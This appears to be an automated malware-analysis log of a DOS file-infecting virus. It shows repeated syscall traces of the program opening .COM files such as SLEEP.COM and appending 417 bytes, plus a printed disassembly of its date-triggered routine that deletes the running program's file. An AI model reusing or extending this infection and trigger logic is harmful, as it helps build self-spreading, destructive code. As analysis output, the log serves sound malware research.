2018-12-25T12:30:16.804480943Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.81021589Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.812565617Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.816691163Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.820921188Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.822996561Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.823964616Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.825703828Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.827473389Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.836661135Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.846080932Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.85828535Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.864703425Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.870600264Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.872167329Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.874821898Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.878159098Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.880363428Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.883558977Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.890903312Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.893872788Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.901022209Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.921461585Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.923993894Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.926594396Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.929453472Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.931092104Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.93508566Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.942688553Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.945594234Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.95349238Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.961123823Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.962627422Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.964781444Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.967820494Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.96925014Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.973922395Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.982223971Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.985564177Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.99249393Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.999205154Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.000885773Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.002968679Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.006327758Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.007695013Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.010516745Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.018285968Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.021107574Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.028661062Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.031488038Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.033135918Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.035172418Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.037910909Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.039278671Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.048443306Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.056928085Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.059199343Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.060461829Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.06310688Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.802379638Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.804341711Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.808728389Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.813321164Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.817976748Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.819812271Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.820920783Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.823108631Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.824874073Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.837973811Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.846661898Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.856763426Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.881768761Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.888554363Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.891432116Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.893154126Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.896098149Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.898798786Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.901658245Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.909546369Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.913390578Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.920293284Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.92707286Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.928934094Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.931448967Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.934041333Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.935304253Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.948729964Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.972052161Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.974763169Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.983431987Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.990321393Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.000672082Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.002759993Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.005340503Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.006668785Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.01065015Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.020512215Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.023385379Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.030616557Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.038176698Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.039860205Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.042678143Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.046360568Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.048252201Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.051263623Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.060001797Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.062899927Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.069565087Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.077172131Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.078930959Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.08064073Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.08452066Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.086164223Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.090213147Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.099273805Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.101964581Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.108384296Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.115753419Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.117166687Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.118500484Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.121991788Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.123443684Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.127142262Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.148804598Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.151482357Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.157845517Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.161443275Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.162881265Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.164212863Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.167768776Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.169268991Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.177477044Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.186661413Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.189549145Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.191060634Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.19374917Z 65 PC: 12bd7 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:30:17.205426079Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.822274331Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.823685445Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.827735594Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.832131693Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.836253098Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.837843521Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.838950696Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.840744876Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.843368497Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.855382485Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.863581314Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.866185905Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.870548297Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.875373058Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.877734295Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.879577864Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.883520112Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.886023889Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.888506074Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.899260999Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.902442178Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.915834711Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.923112436Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.924700425Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.926699004Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.929651181Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.931241183Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.941031776Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.951189358Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.954554207Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.962640787Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.970001452Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.971883581Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.974511074Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.977462949Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.978964314Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.982301465Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.991292037Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.994300861Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.002092924Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.010530213Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.012059444Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.013566167Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.017042518Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.019482523Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.02244667Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.031310587Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.034402027Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.042680147Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.05054739Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.052423551Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.054957945Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.059824418Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.061395705Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.065905884Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.075656327Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.07921299Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.087393345Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.094646861Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.096922245Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.098566485Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.102060881Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.104666733Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.107591275Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.116733638Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.121051403Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.128738972Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.132164309Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.134975963Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.136872947Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.14025078Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.142679753Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.152149103Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.162086678Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.164983397Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.167025107Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.169865462Z 76 PC: 12a45 | Terminate with return code (Return code = '0')